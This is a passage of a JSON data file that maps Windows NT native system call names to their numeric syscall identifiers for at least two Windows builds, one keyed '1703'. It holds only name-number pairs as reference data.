\"NtAllocateLocallyUniqueId\": \"111\", \"NtAllocateReserveObject\": \"112\", \"NtAllocateUserPhysicalPages\": \"113\", \"NtAllocateUuids\": \"114\", \"NtAlpcAcceptConnectPort\": \"115\", \"NtAlpcCancelMessage\": \"116\", \"NtAlpcConnectPort\": \"117\", \"NtAlpcConnectPortEx\": \"118\", \"NtAlpcCreatePort\": \"119\", \"NtAlpcCreatePortSection\": \"120\", \"NtAlpcCreateResourceReserve\": \"121\", \"NtAlpcCreateSectionView\": \"122\", \"NtAlpcCreateSecurityContext\": \"123\", \"NtAlpcDeletePortSection\": \"124\", \"NtAlpcDeleteResourceReserve\": \"125\", \"NtAlpcDeleteSectionView\": \"126\", \"NtAlpcDeleteSecurityContext\": \"127\", \"NtAlpcDisconnectPort\": \"128\", \"NtAlpcImpersonateClientContainerOfPort\": \"129\", \"NtAlpcImpersonateClientOfPort\": \"130\", \"NtAlpcOpenSenderProcess\": \"131\", \"NtAlpcOpenSenderThread\": \"132\", \"NtAlpcQueryInformation\": \"133\", \"NtAlpcQueryInformationMessage\": \"134\", \"NtAlpcRevokeSecurityContext\": \"135\", \"NtAlpcSendWaitReceivePort\": \"136\", \"NtAlpcSetInformation\": \"137\", \"NtAreMappedFilesTheSame\": \"138\", \"NtAssignProcessToJobObject\": \"139\", \"NtAssociateWaitCompletionPacket\": \"140\", \"NtCancelIoFileEx\": \"141\", \"NtCancelSynchronousIoFile\": \"142\", \"NtCancelTimer2\": \"143\", \"NtCancelWaitCompletionPacket\": \"144\", \"NtCommitComplete\": \"145\", \"NtCommitEnlistment\": \"146\", \"NtCommitRegistryTransaction\": \"147\", \"NtCommitTransaction\": \"148\", \"NtCompactKeys\": \"149\", \"NtCompareObjects\": \"150\", \"NtCompareTokens\": \"151\", \"NtCompleteConnectPort\": \"152\", \"NtCompressKey\": \"153\", \"NtConnectPort\": \"154\", \"NtCreateDebugObject\": \"155\", \"NtCreateDirectoryObject\": \"156\", \"NtCreateDirectoryObjectEx\": \"157\", \"NtCreateEnclave\": \"158\", \"NtCreateEnlistment\": \"159\", \"NtCreateEventPair\": \"160\", \"NtCreateIRTimer\": \"161\", \"NtCreateIoCompletion\": \"162\", \"NtCreateJobObject\": \"163\", \"NtCreateJobSet\": \"164\", \"NtCreateKeyTransacted\": \"165\", \"NtCreateKeyedEvent\": \"166\", \"NtCreateLowBoxToken\": \"167\", \"NtCreateMailslotFile\": \"168\", \"NtCreateMutant\": \"169\", \"NtCreateNamedPipeFile\": \"170\", \"NtCreatePagingFile\": \"171\", \"NtCreatePartition\": \"172\", \"NtCreatePort\": \"173\", \"NtCreatePrivateNamespace\": \"174\", \"NtCreateProcess\": \"175\", \"NtCreateProfile\": \"176\", \"NtCreateProfileEx\": \"177\", \"NtCreateRegistryTransaction\": \"178\", \"NtCreateResourceManager\": \"179\", \"NtCreateSemaphore\": \"180\", \"NtCreateSymbolicLinkObject\": \"181\", \"NtCreateThreadEx\": \"182\", \"NtCreateTimer\": \"183\", \"NtCreateTimer2\": \"184\", \"NtCreateToken\": \"185\", \"NtCreateTokenEx\": \"186\", \"NtCreateTransaction\": \"187\", \"NtCreateTransactionManager\": \"188\", \"NtCreateUserProcess\": \"189\", \"NtCreateWaitCompletionPacket\": \"190\", \"NtCreateWaitablePort\": \"191\", \"NtCreateWnfStateName\": \"192\", \"NtCreateWorkerFactory\": \"193\", \"NtDebugActiveProcess\": \"194\", \"NtDebugContinue\": \"195\", \"NtDeleteAtom\": \"196\", \"NtDeleteBootEntry\": \"197\", \"NtDeleteDriverEntry\": \"198\", \"NtDeleteFile\": \"199\", \"NtDeleteKey\": \"200\", \"NtDeleteObjectAuditAlarm\": \"201\", \"NtDeletePrivateNamespace\": \"202\", \"NtDeleteValueKey\": \"203\", \"NtDeleteWnfStateData\": \"204\", \"NtDeleteWnfStateName\": \"205\", \"NtDisableLastKnownGood\": \"206\", \"NtDisplayString\": \"207\", \"NtDrawText\": \"208\", \"NtEnableLastKnownGood\": \"209\", \"NtEnumerateBootEntries\": \"210\", \"NtEnumerateDriverEntries\": \"211\", \"NtEnumerateSystemEnvironmentValuesEx\": \"212\", \"NtEnumerateTransactionObject\": \"213\", \"NtExtendSection\": \"214\", \"NtFilterBootOption\": \"215\", \"NtFilterToken\": \"216\", \"NtFilterTokenEx\": \"217\", \"NtFlushBuffersFileEx\": \"218\", \"NtFlushInstallUILanguage\": \"219\", \"NtFlushInstructionCache\": \"220\", \"NtFlushKey\": \"221\", \"NtFlushProcessWriteBuffers\": \"222\", \"NtFlushVirtualMemory\": \"223\", \"NtFlushWriteBuffer\": \"224\", \"NtFreeUserPhysicalPages\": \"225\", \"NtFreezeRegistry\": \"226\", \"NtFreezeTransactions\": \"227\", \"NtGetCachedSigningLevel\": \"228\", \"NtGetCompleteWnfStateSubscription\": \"229\", \"NtGetContextThread\": \"230\", \"NtGetCurrentProcessorNumber\": \"231\", \"NtGetCurrentProcessorNumberEx\": \"232\", \"NtGetDevicePowerState\": \"233\", \"NtGetMUIRegistryInfo\": \"234\", \"NtGetNextProcess\": \"235\", \"NtGetNextThread\": \"236\", \"NtGetNlsSectionPtr\": \"237\", \"NtGetNotificationResourceManager\": \"238\", \"NtGetWriteWatch\": \"239\", \"NtImpersonateAnonymousToken\": \"240\", \"NtImpersonateThread\": \"241\", \"NtInitializeEnclave\": \"242\", \"NtInitializeNlsFiles\": \"243\", \"NtInitializeRegistry\": \"244\", \"NtInitiatePowerAction\": \"245\", \"NtIsSystemResumeAutomatic\": \"246\", \"NtIsUILanguageComitted\": \"247\", \"NtListenPort\": \"248\", \"NtLoadDriver\": \"249\", \"NtLoadEnclaveData\": \"250\", \"NtLoadKey\": \"251\", \"NtLoadKey2\": \"252\", \"NtLoadKeyEx\": \"253\", \"NtLockFile\": \"254\", \"NtLockProductActivationKeys\": \"255\", \"NtLockRegistryKey\": \"256\", \"NtLockVirtualMemory\": \"257\", \"NtMakePermanentObject\": \"258\", \"NtMakeTemporaryObject\": \"259\", \"NtManagePartition\": \"260\", \"NtMapCMFModule\": \"261\", \"NtMapUserPhysicalPages\": \"262\", \"NtModifyBootEntry\": \"263\", \"NtModifyDriverEntry\": \"264\", \"NtNotifyChangeDirectoryFile\": \"265\", \"NtNotifyChangeKey\": \"266\", \"NtNotifyChangeMultipleKeys\": \"267\", \"NtNotifyChangeSession\": \"268\", \"NtOpenEnlistment\": \"269\", \"NtOpenEventPair\": \"270\", \"NtOpenIoCompletion\": \"271\", \"NtOpenJobObject\": \"272\", \"NtOpenKeyEx\": \"273\", \"NtOpenKeyTransacted\": \"274\", \"NtOpenKeyTransactedEx\": \"275\", \"NtOpenKeyedEvent\": \"276\", \"NtOpenMutant\": \"277\", \"NtOpenObjectAuditAlarm\": \"278\", \"NtOpenPartition\": \"279\", \"NtOpenPrivateNamespace\": \"280\", \"NtOpenProcessToken\": \"281\", \"NtOpenRegistryTransaction\": \"282\", \"NtOpenResourceManager\": \"283\", \"NtOpenSemaphore\": \"284\", \"NtOpenSession\": \"285\", \"NtOpenSymbolicLinkObject\": \"286\", \"NtOpenThread\": \"287\", \"NtOpenTimer\": \"288\", \"NtOpenTransaction\": \"289\", \"NtOpenTransactionManager\": \"290\", \"NtPlugPlayControl\": \"291\", \"NtPrePrepareComplete\": \"292\", \"NtPrePrepareEnlistment\": \"293\", \"NtPrepareComplete\": \"294\", \"NtPrepareEnlistment\": \"295\", \"NtPrivilegeCheck\": \"296\", \"NtPrivilegeObjectAuditAlarm\": \"297\", \"NtPrivilegedServiceAuditAlarm\": \"298\", \"NtPropagationComplete\": \"299\", \"NtPropagationFailed\": \"300\", \"NtPulseEvent\": \"301\", \"NtQueryBootEntryOrder\": \"302\", \"NtQueryBootOptions\": \"303\", \"NtQueryDebugFilterState\": \"304\", \"NtQueryDirectoryObject\": \"305\", \"NtQueryDriverEntryOrder\": \"306\", \"NtQueryEaFile\": \"307\", \"NtQueryFullAttributesFile\": \"308\", \"NtQueryInformationAtom\": \"309\", \"NtQueryInformationEnlistment\": \"310\", \"NtQueryInformationJobObject\": \"311\", \"NtQueryInformationPort\": \"312\", \"NtQueryInformationResourceManager\": \"313\", \"NtQueryInformationTransaction\": \"314\", \"NtQueryInformationTransactionManager\": \"315\", \"NtQueryInformationWorkerFactory\": \"316\", \"NtQueryInstallUILanguage\": \"317\", \"NtQueryIntervalProfile\": \"318\", \"NtQueryIoCompletion\": \"319\", \"NtQueryLicenseValue\": \"320\", \"NtQueryMultipleValueKey\": \"321\", \"NtQueryMutant\": \"322\", \"NtQueryOpenSubKeys\": \"323\", \"NtQueryOpenSubKeysEx\": \"324\", \"NtQueryPortInformationProcess\": \"325\", \"NtQueryQuotaInformationFile\": \"326\", \"NtQuerySecurityAttributesToken\": \"327\", \"NtQuerySecurityObject\": \"328\", \"NtQuerySecurityPolicy\": \"329\", \"NtQuerySemaphore\": \"330\", \"NtQuerySymbolicLinkObject\": \"331\", \"NtQuerySystemEnvironmentValue\": \"332\", \"NtQuerySystemEnvironmentValueEx\": \"333\", \"NtQuerySystemInformationEx\": \"334\", \"NtQueryTimerResolution\": \"335\", \"NtQueryWnfStateData\": \"336\", \"NtQueryWnfStateNameInformation\": \"337\", \"NtQueueApcThreadEx\": \"338\", \"NtRaiseException\": \"339\", \"NtRaiseHardError\": \"340\", \"NtReadOnlyEnlistment\": \"341\", \"NtRecoverEnlistment\": \"342\", \"NtRecoverResourceManager\": \"343\", \"NtRecoverTransactionManager\": \"344\", \"NtRegisterProtocolAddressInformation\": \"345\", \"NtRegisterThreadTerminatePort\": \"346\", \"NtReleaseKeyedEvent\": \"347\", \"NtReleaseWorkerFactoryWorker\": \"348\", \"NtRemoveIoCompletionEx\": \"349\", \"NtRemoveProcessDebug\": \"350\", \"NtRenameKey\": \"351\", \"NtRenameTransactionManager\": \"352\", \"NtReplaceKey\": \"353\", \"NtReplacePartitionUnit\": \"354\", \"NtReplyWaitReplyPort\": \"355\", \"NtRequestPort\": \"356\", \"NtResetEvent\": \"357\", \"NtResetWriteWatch\": \"358\", \"NtRestoreKey\": \"359\", \"NtResumeProcess\": \"360\", \"NtRevertContainerImpersonation\": \"361\", \"NtRollbackComplete\": \"362\", \"NtRollbackEnlistment\": \"363\", \"NtRollbackRegistryTransaction\": \"364\", \"NtRollbackTransaction\": \"365\", \"NtRollforwardTransactionManager\": \"366\", \"NtSaveKey\": \"367\", \"NtSaveKeyEx\": \"368\", \"NtSaveMergedKeys\": \"369\", \"NtSecureConnectPort\": \"370\", \"NtSerializeBoot\": \"371\", \"NtSetBootEntryOrder\": \"372\", \"NtSetBootOptions\": \"373\", \"NtSetCachedSigningLevel\": \"374\", \"NtSetCachedSigningLevel2\": \"375\", \"NtSetContextThread\": \"376\", \"NtSetDebugFilterState\": \"377\", \"NtSetDefaultHardErrorPort\": \"378\", \"NtSetDefaultLocale\": \"379\", \"NtSetDefaultUILanguage\": \"380\", \"NtSetDriverEntryOrder\": \"381\", \"NtSetEaFile\": \"382\", \"NtSetHighEventPair\": \"383\", \"NtSetHighWaitLowEventPair\": \"384\", \"NtSetIRTimer\": \"385\", \"NtSetInformationDebugObject\": \"386\", \"NtSetInformationEnlistment\": \"387\", \"NtSetInformationJobObject\": \"388\", \"NtSetInformationKey\": \"389\", \"NtSetInformationResourceManager\": \"390\", \"NtSetInformationSymbolicLink\": \"391\", \"NtSetInformationToken\": \"392\", \"NtSetInformationTransaction\": \"393\", \"NtSetInformationTransactionManager\": \"394\", \"NtSetInformationVirtualMemory\": \"395\", \"NtSetInformationWorkerFactory\": \"396\", \"NtSetIntervalProfile\": \"397\", \"NtSetIoCompletion\": \"398\", \"NtSetIoCompletionEx\": \"399\", \"NtSetLdtEntries\": \"400\", \"NtSetLowEventPair\": \"401\", \"NtSetLowWaitHighEventPair\": \"402\", \"NtSetQuotaInformationFile\": \"403\", \"NtSetSecurityObject\": \"404\", \"NtSetSystemEnvironmentValue\": \"405\", \"NtSetSystemEnvironmentValueEx\": \"406\", \"NtSetSystemInformation\": \"407\", \"NtSetSystemPowerState\": \"408\", \"NtSetSystemTime\": \"409\", \"NtSetThreadExecutionState\": \"410\", \"NtSetTimer2\": \"411\", \"NtSetTimerEx\": \"412\", \"NtSetTimerResolution\": \"413\", \"NtSetUuidSeed\": \"414\", \"NtSetVolumeInformationFile\": \"415\", \"NtSetWnfProcessNotificationEvent\": \"416\", \"NtShutdownSystem\": \"417\", \"NtShutdownWorkerFactory\": \"418\", \"NtSignalAndWaitForSingleObject\": \"419\", \"NtSinglePhaseReject\": \"420\", \"NtStartProfile\": \"421\", \"NtStopProfile\": \"422\", \"NtSubscribeWnfStateChange\": \"423\", \"NtSuspendProcess\": \"424\", \"NtSuspendThread\": \"425\", \"NtSystemDebugControl\": \"426\", \"NtTerminateJobObject\": \"427\", \"NtTestAlert\": \"428\", \"NtThawRegistry\": \"429\", \"NtThawTransactions\": \"430\", \"NtTraceControl\": \"431\", \"NtTranslateFilePath\": \"432\", \"NtUmsThreadYield\": \"433\", \"NtUnloadDriver\": \"434\", \"NtUnloadKey\": \"435\", \"NtUnloadKey2\": \"436\", \"NtUnloadKeyEx\": \"437\", \"NtUnlockFile\": \"438\", \"NtUnlockVirtualMemory\": \"439\", \"NtUnmapViewOfSectionEx\": \"440\", \"NtUnsubscribeWnfStateChange\": \"441\", \"NtUpdateWnfStateData\": \"442\", \"NtVdmControl\": \"443\", \"NtWaitForAlertByThreadId\": \"444\", \"NtWaitForDebugEvent\": \"445\", \"NtWaitForKeyedEvent\": \"446\", \"NtWaitForWorkViaWorkerFactory\": \"447\", \"NtWaitHighEventPair\": \"448\", \"NtWaitLowEventPair\": \"449\"}, \"1703\": {\"NtAccessCheck\": \"0\", \"NtWorkerFactoryWorkerReady\": \"1\", \"NtAcceptConnectPort\": \"2\", \"NtMapUserPhysicalPagesScatter\": \"3\", \"NtWaitForSingleObject\": \"4\", \"NtCallbackReturn\": \"5\", \"NtReadFile\": \"6\", \"NtDeviceIoControlFile\": \"7\", \"NtWriteFile\": \"8\", \"NtRemoveIoCompletion\": \"9\", \"NtReleaseSemaphore\": \"10\", \"NtReplyWaitReceivePort\": \"11\", \"NtReplyPort\": \"12\", \"NtSetInformationThread\": \"13\", \"NtSetEvent\": \"14\", \"NtClose\": \"15\", \"NtQueryObject\": \"16\", \"NtQueryInformationFile\": \"17\", \"NtOpenKey\": \"18\", \"NtEnumerateValueKey\": \"19\", \"NtFindAtom\": \"20\", \"NtQueryDefaultLocale\": \"21\", \"NtQueryKey\": \"22\", \"NtQueryValueKey\": \"23\", \"NtAllocateVirtualMemory\": \"24\", \"NtQueryInformationProcess\": \"25\", \"NtWaitForMultipleObjects32\": \"26\", \"NtWriteFileGather\": \"27\", \"NtSetInformationProcess\": \"28\", \"NtCreateKey\": \"29\", \"NtFreeVirtualMemory\": \"30\", \"NtImpersonateClientOfPort\": \"31\", \"NtReleaseMutant\": \"32\", \"NtQueryInformationToken\": \"33\", \"NtRequestWaitReplyPort\": \"34\", \"NtQueryVirtualMemory\": \"35\", \"NtOpenThreadToken\": \"36\", \"NtQueryInformationThread\": \"37\", \"NtOpenProcess\": \"38\", \"NtSetInformationFile\": \"39\", \"NtMapViewOfSection\": \"40\", \"NtAccessCheckAndAuditAlarm\": \"41\", \"NtUnmapViewOfSection\": \"42\", \"NtReplyWaitReceivePortEx\": \"43\", \"NtTerminateProcess\": \"44\", \"NtSetEventBoostPriority\": \"45\", \"NtReadFileScatter\": \"46\", \"NtOpenThreadTokenEx\": \"47\", \"NtOpenProcessTokenEx\": \"48\", \"NtQueryPerformanceCounter\": \"49\", \"NtEnumerateKey\": \"50\", \"NtOpenFile\": \"51\", \"NtDelayExecution\": \"52\", \"NtQueryDirectoryFile\": \"53\", \"NtQuerySystemInformation\": \"54\", \"NtOpenSection\": \"55\", \"NtQueryTimer\": \"56\", \"NtFsControlFile\": \"57\", \"NtWriteVirtualMemory\": \"58\", \"NtCloseObjectAuditAlarm\": \"59\", \"NtDuplicateObject\": \"60\", \"NtQueryAttributesFile\": \"61\", \"NtClearEvent\": \"62\", \"NtReadVirtualMemory\": \"63\", \"NtOpenEvent\": \"64\", \"NtAdjustPrivilegesToken\": \"65\", \"NtDuplicateToken\": \"66\", \"NtContinue\": \"67\", \"NtQueryDefaultUILanguage\": \"68\", \"NtQueueApcThread\": \"69\", \"NtYieldExecution\": \"70\", \"NtAddAtom\": \"71\", \"NtCreateEvent\": \"72\", \"NtQueryVolumeInformationFile\": \"73\", \"NtCreateSection\": \"74\", \"NtFlushBuffersFile\": \"75\", \"NtApphelpCacheControl\": \"76\", \"NtCreateProcessEx\": \"77\", \"NtCreateThread\": \"78\", \"NtIsProcessInJob\": \"79\", \"NtProtectVirtualMemory\": \"80\", \"NtQuerySection\": \"81\", \"NtResumeThread\": \"82\", \"NtTerminateThread\": \"83\", \"NtReadRequestData\": \"84\", \"NtCreateFile\": \"85\", \"NtQueryEvent\": \"86\", \"NtWriteRequestData\": \"87\", \"NtOpenDirectoryObject\": \"88\", \"NtAccessCheckByTypeAndAuditAlarm\": \"89\", \"NtQuerySystemTime\": \"90\", \"NtWaitForMultipleObjects\": \"91\", \"NtSetInformationObject\": \"92\", \"NtCancelIoFile\": \"93\", \"NtTraceEvent\": \"94\", \"NtPowerInformation\": \"95\", \"NtSetValueKey\": \"96\", \"NtCancelTimer\": \"97\", \"NtSetTimer\": \"98\", \"NtAccessCheckByType\": \"99\", \"NtAccessCheckByTypeResultList\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"101\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"102\", \"NtAcquireProcessActivityReference\": \"103\", \"NtAddAtomEx\": \"104\", \"NtAddBootEntry\": \"105\", \"NtAddDriverEntry\": \"106\", \"NtAdjustGroupsToken\": \"107\", \"NtAdjustTokenClaimsAndDeviceGroups\": \"108\", \"NtAlertResumeThread\": \"109\", \"NtAlertThread\": \"110\", \"NtAlertThreadByThreadId\": \"111\", \"NtAllocateLocallyUniqueId\": \"112\", \"NtAllocateReserveObject\": \"113\", \"NtAllocateUserPhysicalPages\": \"114\", \"NtAllocateUuids\": \"115\", \"NtAlpcAcceptConnectPort\": \"116\", \"NtAlpcCancelMessage\": \"117\", \"NtAlpcConnectPort\": \"118\", \"NtAlpcConnectPortEx\": \"119\", \"NtAlpcCreatePort\": \"120\", \"NtAlpcCreatePortSection\": \"121\", \"NtAlpcCreateResourceReserve\": \"122\", \"NtAlpcCreateSectionView\": \"123\", \"NtAlpcCreateSecurityContext\": \"124\", \"NtAlpcDeletePortSection\": \"125\", \"NtAlpcDeleteResourceReserve\": \"126\", \"NtAlpcDeleteSectionView\": \"127\", \"NtAlpcDeleteSecurityContext\": \"128\", \"NtAlpcDisconnectPort\": \"129\", \"NtAlpcImpersonateClientContainerOfPort\": \"130\", \"NtAlpcImpersonateClientOfPort\": \"131\", \"NtAlpcOpenSenderProcess\": \"132\", \"NtAlpcOpenSenderThread\": \"133\", \"NtAlpcQueryInformation\": \"134\", \"NtAlpcQueryInformationMessage\": \"135\", \"NtAlpcRevokeSecurityContext\": \"136\", \"NtAlpcSendWaitReceivePort\": \"137\", \"NtAlpcSetInformation\": \"138\", \"NtAreMappedFilesTheSame\": \"139\", \"NtAssignProcessToJobObject\": \"140\", \"NtAssociateWaitCompletionPacket\": \"141\", \"NtCancelIoFileEx\": \"142\", \"NtCancelSynchronousIoFile\": \"143\", \"NtCancelTimer2\": \"144\", \"NtCancelWaitCompletionPacket\": \"145\", \"NtCommitComplete\": \"146\", \"NtCommitEnlistment\": \"147\", \"NtCommitRegistryTransaction\": \"148\", \"NtCommitTransaction\": \"149\", \"NtCompactKeys\": \"150\", \"NtCompareObjects\": \"151\", \"NtCompareSigningLevels\": \"152\", \"NtCompareTokens\": \"153\", \"NtCompleteConnectPort\": \"154\", \"NtCompressKey\": \"155\", \"NtConnectPort\": \"156\", \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\": \"157\", \"NtCreateDebugObject\": \"158\", \"NtCreateDirectoryObject\": \"159\", \"NtCreateDirectoryObjectEx\": \"160\", \"NtCreateEnclave\": \"161\", \"NtCreateEnlistment\": \"162\", \"NtCreateEventPair\": \"163\", \"NtCreateIRTimer\": \"164\", \"NtCreateIoCompletion\": \"165\", \"NtCreateJobObject\": \"166\", \"NtCreateJobSet\": \"167\", \"NtCreateKeyTransacted\": \"168\", \"NtCreateKeyedEvent\": \"169\", \"NtCreateLowBoxToken\": \"170\", \"NtCreateMailslotFile\": \"171\", \"NtCreateMutant\": \"172\", \"NtCreateNamedPipeFile\": \"173\", \"NtCreatePagingFile\": \"174\", \"NtCreatePartition\": \"175\", \"NtCreatePort\": \"176\", \"NtCreatePrivateNamespace\": \"177\", \"NtCreateProcess\": \"178\", \"NtCreateProfile\": \"179\", \"NtCreateProfileEx\": \"180\", \"NtCreateRegistryTransaction\": \"181\", \"NtCreateResourceManager\": \"182\", \"NtCreateSemaphore\": \"183\", \"NtCreateSymbolicLinkObject\": \"184\", \"NtCreateThreadEx\": \"185\", \"NtCreateTimer\": \"186\", \"NtCreateTimer2\": \"187\", \"NtCreateToken\": \"188\", \"NtCreateTokenEx\": \"189\", \"NtCreateTransaction\": \"190\", \"NtCreateTransactionManager\": \"191\", \"NtCreateUserProcess\": \"192\", \"NtCreateWaitCompletionPacket\": \"193\", \"NtCreateWaitablePort\": \"194\", \"NtCreateWnfStateName\": \"195\", \"NtCreateWorkerFactory\": \"196\", \"NtDebugActiveProcess\": \"197\", \"NtDebugContinue\": \"198\", \"NtDeleteAtom\": \"199\", \"NtDeleteBootEntry\": \"200\", \"NtDeleteDriverEntry\": \"201\", \"NtDeleteFile\": \"202\", \"NtDeleteKey\": \"203\", \"NtDeleteObjectAuditAlarm\": \"204\", \"NtDeletePrivateNamespace\": \"205\", \"NtDeleteValueKey\": \"206\", \"NtDeleteWnfStateData\": \"207\", \"NtDeleteWnfStateName\": \"208\", \"NtDisableLastKnownGood\": \"209\", \"NtDisplayString\": \"210\", \"NtDrawText\": \"211\", \"NtEnableLastKnownGood\": \"212\", \"NtEnumerateBootEntries\": \"213\", \"NtEnumerateDriverEntries\": \"214\", \"NtEnumerateSystemEnvironmentValuesEx\": \"215\", \"NtEnumerateTransactionObject\": \"216\", \"NtExtendSection\": \"217\", \"NtFilterBootOption\": \"218\", \"NtFilterToken\": \"219\", \"NtFilterTokenEx\": \"220\", \"NtFlushBuffersFileEx\": \"221\", \"NtFlushInstallUILanguage\": \"222\", \"NtFlushInstructionCache\": \"223\", \"NtFlushKey\": \"224\", \"NtFlushProcessWriteBuffers\": \"225\", \"NtFlushVirtualMemory\": \"226\", \"NtFlushWriteBuffer\": \"227\", \"NtFreeUserPhysicalPages\": \"228\", \"NtFreezeRegistry\": \"229\", \"NtFreezeTransactions\": \"230\", \"NtGetCachedSigningLevel\": \"231\", \"NtGetCompleteWnfStateSubscription\": \"232\", \"NtGetContextThread\": \"233\", \"NtGetCurrentProcessorNumber\": \"234\", \"NtGetCurrentProcessorNumberEx\": \"235\", \"NtGetDevicePowerState\": \"236\", \"NtGetMUIRegistryInfo\": \"237\", \"NtGetNextProcess\": \"238\", \"NtGetNextThread\": \"239\", \"NtGetNlsSectionPtr\": \"240\", \"NtGetNotificationResourceManager\": \"241\", \"NtGetWriteWatch\": \"242\", \"NtImpersonateAnonymousToken\": \"243\", \"NtImpersonateThread\": \"244\", \"NtInitializeEnclave\": \"245\", \"NtInitializeNlsFiles\": \"246\", \"NtInitializeRegistry\": \"247\", \"NtInitiatePowerAction\": \"248\", \"NtIsSystemResumeAutomatic\": \"249\", \"NtIsUILanguageComitted\": \"250\", \"NtListenPort\": \"251\", \"NtLoadDriver\": \"252\", \"NtLoadEnclaveData\": \"253\", \"NtLoadHotPatch\": \"254\", \"NtLoadKey\": \"255\", \"NtLoadKey2\": \"256\", \"NtLoadKeyEx\": \"257\", \"NtLockFile\": \"258\", \"NtLockProductActivationKeys\": \"259\", \"NtLockRegistryKey\": \"260\", \"NtLockVirtualMemory\": \"261\", \"NtMakePermanentObject\": \"262\", \"NtMakeTemporaryObject\": \"263\", \"NtManagePartition\": \"264\", \"NtMapCMFModule\": \"265\", \"NtMapUserPhysicalPages\": \"266\", \"NtModifyBootEntry\": \"267\", \"NtModifyDriverEntry\": \"268\", \"NtNotifyChangeDirectoryFile\": \"269\", \"NtNotifyChangeKey\": \"270\", \"NtNotifyChangeMultipleKeys\": \"271\", \"NtNotifyChangeSession\": \"272\", \"NtOpenEnlistment\": \"273\", \"NtOpenEventPair\": \"274\", \"NtOpenIoCompletion\": \"275\", \"NtOpenJobObject\": \"276\", \"NtOpenKeyEx\": \"277\", \"NtOpenKeyTransacted\": \"278\", \"NtOpenKeyTransactedEx\": \"279\", \"NtOpenKeyedEvent\": \"280\", \"NtOpenMutant\": \"281\", \"NtOpenObjectAuditAlarm\": \"282\", \"NtOpenPartition\": \"283\", \"NtOpenPrivateNamespace\": \"284\", \"NtOpenProcessToken\": \"285\", \"NtOpenRegistryTransaction\": \"286\", \"NtOpenResourceManager\": \"287\", \"NtOpenSemaphore\": \"288\", \"NtOpenSession\": \"289\", \"NtOpenSymbolicLinkObject\": \"290\", \"NtOpenThread\": \"291\", \"NtOpenTimer\": \"292\", \"NtOpenTransaction\": \"293\", \"NtOpenTransactionManager\": \"294\", \"NtPlugPlayControl\": \"295\", \"NtPrePrepareComplete\": \"296\", \"NtPrePrepareEnlistment\": \"297\", \"NtPrepareComplete\": \"298\", \"NtPrepareEnlistment\": \"299\", \"NtPrivilegeCheck\": \"300\", \"NtPrivilegeObjectAuditAlarm\": \"301\", \"NtPrivilegedServiceAuditAlarm\": \"302\", \"NtPropagationComplete\": \"303\", \"NtPropagationFailed\": \"304\", \"NtPulseEvent\": \"305\", \"NtQueryAuxiliaryCounterFrequency\": \"306\", \"NtQueryBootEntryOrder\": \"307\", \"NtQueryBootOptions\": \"308\", \"NtQueryDebugFilterState\": \"309\", \"NtQueryDirectoryObject\": \"310\", \"NtQueryDriverEntryOrder\": \"311\", \"NtQueryEaFile\": \"312\", \"NtQueryFullAttributesFile\": \"313\", \"NtQueryInformationAtom\": \"314\", \"NtQueryInformationByName\": \"315\", \"NtQueryInformationEnlistment\": \"316\", \"NtQueryInformationJobObject\": \"317\", \"NtQueryInformationPort\": \"318\", \"NtQueryInformationResourceManager\": \"319\", \"NtQueryInformationTransaction\": \"320\", \"NtQueryInformationTransactionManager\": \"321\", \"NtQueryInformationWorkerFactory\": \"322\", \"NtQueryInstallUILanguage\": \"323\", \"NtQueryIntervalProfile\": \"324\", \"NtQueryIoCompletion\": \"325\", \"NtQueryLicenseValue\": \"326\", \"NtQueryMultipleValueKey\": \"327\", \"NtQueryMutant\": \"328\", \"NtQueryOpenSubKeys\": \"329\", \"NtQueryOpenSubKeysEx\": \"330\", \"NtQueryPortInformationProcess\": \"331\", \"NtQueryQuotaInformationFile\": \"332\", \"NtQuerySecurityAttributesToken\": \"333\", \"NtQuerySecurityObject\": \"334\", \"NtQuerySecurityPolicy\": \"335\", \"NtQuerySemaphore\": \"336\", \"NtQuerySymbolicLinkObject\": \"337\", \"NtQuerySystemEnvironmentValue\": \"338\", \"NtQuerySystemEnvironmentValueEx\": \"339\", \"NtQuerySystemInformationEx\": \"340\", \"NtQueryTimerResolution\": \"341\", \"NtQueryWnfStateData\": \"342\", \"NtQueryWnfStateNameInformation\": \"343\", \"NtQueueApcThreadEx\": \"344\", \"NtRaiseException\": \"345\", \"NtRaiseHardError\": \"346\", \"NtReadOnlyEnlistment\": \"347\", \"NtRecoverEnlistment\": \"348\", \"NtRecoverResourceManager\": \"349\", \"NtRecoverTransactionManager\": \"350\", \"NtRegisterProtocolAddressInformation\": \"351\", \"NtRegisterThreadTerminatePort\": \"352\", \"NtReleaseKeyedEvent\": \"353\", \"NtReleaseWorkerFactoryWorker\": \"354\", \"NtRemoveIoCompletionEx\": \"355\", \"NtRemoveProcessDebug\": \"356\", \"NtRenameKey\": \"357\", \"NtRenameTransactionManager\": \"358\", \"NtReplaceKey\": \"359\", \"NtReplacePartitionUnit\": \"360\", \"NtReplyWaitReplyPort\": \"361\", \"NtRequestPort\": \"362\", \"NtResetEvent\": \"363\", \"NtResetWriteWatch\": \"364\", \"NtRestoreKey\": \"365\", \"NtResumeProcess\": \"366\", \"NtRevertContainerImpersonation\": \"367\", \"NtRollbackComplete\": \"368\", \"NtRollbackEnlistment\": \"369\", \"NtRollbackRegistryTransaction\": \"370\", \"NtRollbackTransaction\": \"371\", \"NtRollforwardTransactionManager\": \"372\", \"NtSaveKey\": \"373\", \"NtSaveKeyEx\": \"374\", \"NtSaveMergedKeys\": \"375\", \"NtSecureConnectPort\": \"376\", \"NtSerializeBoot\": \"377\", \"NtSetBootEntryOrder\": \"378\", \"NtSetBootOptions\": \"379\", \"NtSetCachedSigningLevel\": \"380\", \"NtSetCachedSigningLevel2\": \"381\", \"NtSetContextThread\": \"382\", \"NtSetDebugFilterState\": \"383\", \"NtSetDefaultHardErrorPort\": \"384\", \"NtSetDefaultLocale\": \"385\", \"NtSetDefaultUILanguage\": \"386\", \"NtSetDriverEntryOrder\": \"387\", \"NtSetEaFile\": \"388\", \"NtSetHighEventPair\": \"389\", \"NtSetHighWaitLowEventPair\": \"390\", \"NtSetIRTimer\": \"391\", \"NtSetInformationDebugObject\": \"392\", \"NtSetInformationEnlistment\": \"393\", \"NtSetInformationJobObject\": \"394\", \"NtSetInformationKey\": \"395\", \"NtSetInformationResourceManager\": \"396\", \"NtSetInformationSymbolicLink\": \"397\", \"NtSetInformationToken\": \"398\", \"NtSetInformationTransaction\": \"399\", 